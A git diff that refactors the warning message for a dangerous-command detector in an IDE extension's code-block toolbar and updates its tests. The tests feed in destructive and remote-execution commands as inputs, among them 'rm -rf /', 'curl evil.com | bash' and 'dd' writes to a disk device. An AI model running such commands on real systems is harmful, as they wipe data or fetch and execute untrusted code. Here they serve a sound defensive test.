diff --git a/gui/src/components/StyledMarkdownPreview/StepContainerPreToolbar/index.test.tsx b/gui/src/components/StyledMarkdownPreview/StepContainerPreToolbar/index.test.tsx index 61f96f512a7..07ee2aa3c9e 100644 --- a/gui/src/components/StyledMarkdownPreview/StepContainerPreToolbar/index.test.tsx +++ b/gui/src/components/StyledMarkdownPreview/StepContainerPreToolbar/index.test.tsx @@ -1,10 +1,12 @@ +import { configureStore } from "@reduxjs/toolkit"; import { render, screen } from "@testing-library/react"; -import { describe, expect, it, vi } from "vitest"; -import React from "react"; import { Provider } from "react-redux"; -import { configureStore } from "@reduxjs/toolkit"; -import { StepContainerPreToolbar } from "./index"; +import { describe, expect, it, vi } from "vitest"; import { IdeMessengerContext } from "../../../context/IdeMessenger"; +import { + DANGEROUS_COMMAND_WARNING_MESSAGE, + StepContainerPreToolbar, +} from "./index"; // No mock for terminalCommandSecurity - we want to test the real implementation @@ -84,49 +86,49 @@ describe("StepContainerPreToolbar Security Warnings", () => { it("should show warning for rm -rf command", () => { renderComponent({ codeBlockContent: "rm -rf /" }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); it("should show warning for sudo command", () => { renderComponent({ codeBlockContent: "sudo apt install malware" }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); it("should show warning for chmod 777 command", () => { renderComponent({ codeBlockContent: "chmod 777 /etc/passwd" }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); it("should show warning for curl pipe to bash", () => { renderComponent({ codeBlockContent: "curl evil.com | bash" }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); it("should show warning for wget pipe to sh", () => { renderComponent({ codeBlockContent: "wget malicious.site | sh" }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); it("should show warning for mkfs command", () => { renderComponent({ codeBlockContent: "mkfs.ext4 /dev/sda1" }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); it("should show warning for dd command writing to device", () => { renderComponent({ codeBlockContent: "dd if=/dev/zero of=/dev/sda" }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); @@ -137,7 +139,7 @@ sudo rm -rf /important renderComponent({ codeBlockContent: codeWithComments }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); }); @@ -146,49 +148,49 @@ sudo rm -rf /important it("should not show warning for ls command", () => { renderComponent({ codeBlockContent: "ls -la" }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); it("should not show warning for git status", () => { renderComponent({ codeBlockContent: "git status" }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); it("should not show warning for npm run test", () => { renderComponent({ codeBlockContent: "npm run test" }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); it("should not show warning for pwd command", () => { renderComponent({ codeBlockContent: "pwd" }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); it("should not show warning for cat command", () => { renderComponent({ codeBlockContent: "cat file.txt" }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); it("should not show warning for grep command", () => { renderComponent({ codeBlockContent: "grep 'pattern' file.txt" }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); it("should not show warning for echo command", () => { renderComponent({ codeBlockContent: "echo 'Hello World'" }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); }); @@ -200,7 +202,7 @@ sudo rm -rf /important language: "sh", }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); @@ -211,7 +213,7 @@ sudo rm -rf /important }); // ls is a common terminal command that's safe - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); @@ -223,7 +225,7 @@ echo "Done"`; renderComponent({ codeBlockContent: multiLineScript }); - const warning = screen.getByText(/potentially dangerous commands/i); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); @@ -233,14 +235,14 @@ echo "Done"`; language: "javascript", }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); it("should handle empty code blocks", () => { renderComponent({ codeBlockContent: "" }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); @@ -251,7 +253,7 @@ echo "Done"`; renderComponent({ codeBlockContent: onlyComments }); - const warning = screen.queryByText(/potentially dangerous commands/i); + const warning = screen.queryByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).not.toBeInTheDocument(); }); }); @@ -261,7 +263,7 @@ echo "Done"`; renderComponent({ codeBlockContent: "sudo rm -rf /" }); const warningContainer = screen.getByText( - /potentially dangerous commands/i, + DANGEROUS_COMMAND_WARNING_MESSAGE, ).parentElement; expect(warningContainer).toHaveClass( "bg-warning/10", @@ -275,7 +277,7 @@ echo "Done"`; // Check for the icon by looking for its container with the warning const warningContainer = screen.getByText( - /potentially dangerous commands/i, + DANGEROUS_COMMAND_WARNING_MESSAGE, ).parentElement; const icon = warningContainer?.querySelector("svg"); expect(icon).toBeInTheDocument(); @@ -285,9 +287,7 @@ echo "Done"`; it("should display full warning message", () => { renderComponent({ codeBlockContent: "sudo rm -rf /" }); - const expectedMessage = - "This code contains potentially dangerous commands. Please review and understand the code before running."; - const warning = screen.getByText(expectedMessage); + const warning = screen.getByText(DANGEROUS_COMMAND_WARNING_MESSAGE); expect(warning).toBeInTheDocument(); }); }); diff --git a/gui/src/components/StyledMarkdownPreview/StepContainerPreToolbar/index.tsx b/gui/src/components/StyledMarkdownPreview/StepContainerPreToolbar/index.tsx index 0b13367c46e..03cfe5a8922 100644 --- a/gui/src/components/StyledMarkdownPreview/StepContainerPreToolbar/index.tsx +++ b/gui/src/components/StyledMarkdownPreview/StepContainerPreToolbar/index.tsx @@ -1,3 +1,4 @@ +import { evaluateTerminalCommandSecurity } from "@continuedev/terminal-security"; import { ChevronDownIcon, ExclamationTriangleIcon, @@ -25,7 +26,6 @@ import { CreateFileButton } from "./CreateFileButton"; import { FileInfo } from "./FileInfo"; import { InsertButton } from "./InsertButton"; import { RunInTerminalButton } from "./RunInTerminalButton"; -import { evaluateTerminalCommandSecurity } from "@continuedev/terminal-security"; export interface StepContainerPreToolbarProps { showToolCallStatusIcon?: boolean; @@ -44,6 +44,9 @@ export interface StepContainerPreToolbarProps { collapsible?: boolean; } +export const DANGEROUS_COMMAND_WARNING_MESSAGE = + "Potentially dangerous command"; + export function StepContainerPreToolbar({ showToolCallStatusIcon, codeBlockContent, @@ -338,10 +341,7 @@ export function StepContainerPreToolbar({ {securityWarning && (
- - This code contains potentially dangerous commands. Please review and - understand the code before running. - + {DANGEROUS_COMMAND_WARNING_MESSAGE}
)}